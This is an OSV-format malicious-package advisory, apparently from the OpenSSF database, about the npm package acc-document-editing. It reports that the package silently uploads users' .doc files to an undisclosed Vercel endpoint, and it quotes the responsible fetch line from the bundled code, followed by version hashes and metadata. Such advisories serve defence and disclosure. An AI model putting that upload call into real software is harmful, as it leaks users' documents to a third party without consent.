{
  "id": "MAL-2026-4474",
  "summary": "Malicious code in acc-document-editing (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456)\nThe DocumentEditor React component exported by this package, when an end-user opens a .doc file, POSTs the raw file bytes to https://converter-apis.vercel.app/api/convert — a generic Vercel-hosted endpoint that is not OnlyOffice and is not disclosed in the package's README or API documentation. The README advertises a self-hosted OnlyOffice/X2T integration (X2T conversion runs locally in WASM), so integrators reasonably expect document content to stay on their own infrastructure. The .doc handling path in dist/index.cjs:565 (`fetch(\"https://converter-apis.vercel.app/api/convert\", { method: \"POST\", body: new Blob([arrayBuffer], { type: \"application/msword\" }) })`) silently relays end-user document bytes to the package author's chosen third-party endpoint with no consent UI, no documentation, and no configuration option to disable or redirect the upload. The destination is a generic free-tier Vercel hostname rather than an OnlyOffice domain, breaking the trust expectation of the advertised self-hosted editor.\nThe postinstall script that copies static assets into the host project's public/ directory, and the child_process/fetch references inside the bundled X2T WASM toolchain, are documented and purpose-matched (X2T is the OnlyOffice document conversion tool); those are not the basis for the verdict.\n",
  "modified": "2026-05-27T00:32:11.722623667Z",
  "published": "2026-05-22T03:57:37Z",
  "withdrawn": "2026-05-26T22:02:02Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "versions": ["0.1.6"],
        "source": "amazon-inspector",
        "modified_time": "2026-05-22T06:30:59Z",
        "import_time": "2026-05-26T05:52:02.43010972Z",
        "sha256": "300b0fa8657f3531b6990a1427fbf9883f27a012eb91ca6f515bda5c6695c63a",
        "id": "IN-MAL-2026-004154"
      },
      {
        "versions": ["0.1.1"],
        "source": "amazon-inspector",
        "modified_time": "2026-05-22T03:57:37Z",
        "import_time": "2026-05-26T05:51:59.95788369Z",
        "sha256": "4dea118c9eb477ec5d4842309ad2d353632ef1b4bd7ceceabbee936c94ea19f1",
        "id": "IN-MAL-2026-004132"
      },
      {
        "versions": ["0.1.3"],
        "source": "amazon-inspector",
        "modified_time": "2026-05-22T06:11:58Z",
        "import_time": "2026-05-26T05:52:00.882790959Z",
        "sha256": "7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456",
        "id": "IN-MAL-2026-004140"
      },
      {
        "versions": ["0.1.8"],
        "source": "amazon-inspector",
        "modified_time": "2026-05-22T08:53:55Z",
        "import_time": "2026-05-26T05:52:04.853595431Z",
        "sha256": "9b4dff3f17804b520a1421d5ecca176d481a65930e32a46c1b1da4bb21194d06",
        "id": "IN-MAL-2026-004174"
      },
      {
        "versions": ["0.1.5"],
        "source": "amazon-inspector",
        "modified_time": "2026-05-22T06:12:08Z",
        "import_time": "2026-05-26T05:52:00.980238332Z",
        "sha256": "b74b26220c2074eb335eba78c232af51f0eaf60f48c97056c4a47940cedd84c2",
        "id": "IN-MAL-2026-004141"
      },
      {
        "versions": ["0.1.4"],
        "source": "amazon-inspector",
        "modified_time": "2026-05-22T06:17:06Z",
        "import_time": "2026-05-26T05:52:01.771400206Z",
        "sha256": "e5dc5175de5b1daead3a42da4e20d7297d2de0fb4864870d8a06011ff4271d05",
        "id": "IN-MAL-2026-004148"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/acc-document-editing/v/0.1.6"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/acc-document-editing/v/0.1.1"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/acc-document-editing/v/0.1.3"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/acc-document-editing/v/0.1.8"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/acc-document-editing/v/0.1.5"},
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/acc-document-editing/v/0.1.4"}
  ],
  "affected": [
    {
      "package": {
        "name": "acc-document-editing",
        "ecosystem": "npm",
        "purl": "pkg:npm/acc-document-editing"
      },
      "versions": ["0.1.6", "0.1.1", "0.1.3", "0.1.8", "0.1.5", "0.1.4"],
      "database_specific": {
        "indicators": {
          "evidence_files": [
            {
              "sha256": "85770fdf802e36eb2ea61cfa774cbe37c6b1cb259e581050aab63ff036f778ef",
              "path": "dist/index.js",
              "tlsh": "4cb3eff60716bce54e3a2c40a50938441de93c1f6768c5acfe8c41e1bbd6552ef6acb8"
            }
          ],
          "package_integrity": [
            {
              "filename": "acc-document-editing-0.1.6.tgz",
              "hashes": {
                "sha1": "50a23de4337b743570d3724ba104e6485ac8a952",
                "sha512_sri": "sha512-9Pw0Pwy36wEPwwMO2ZJtgz8Z/WL14JsWXd+G+LbCnpYSHGrsNXYC4QPxTZMnqF5UuArtzTZkzISNgDxeGhMeRg=="
              }
            }
          ]
        },
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/acc-document-editing/MAL-2026-4474.json",
        "cwes": [
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"}
        ]
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["actran@amazon.com"], "type": "FINDER"}
  ]
}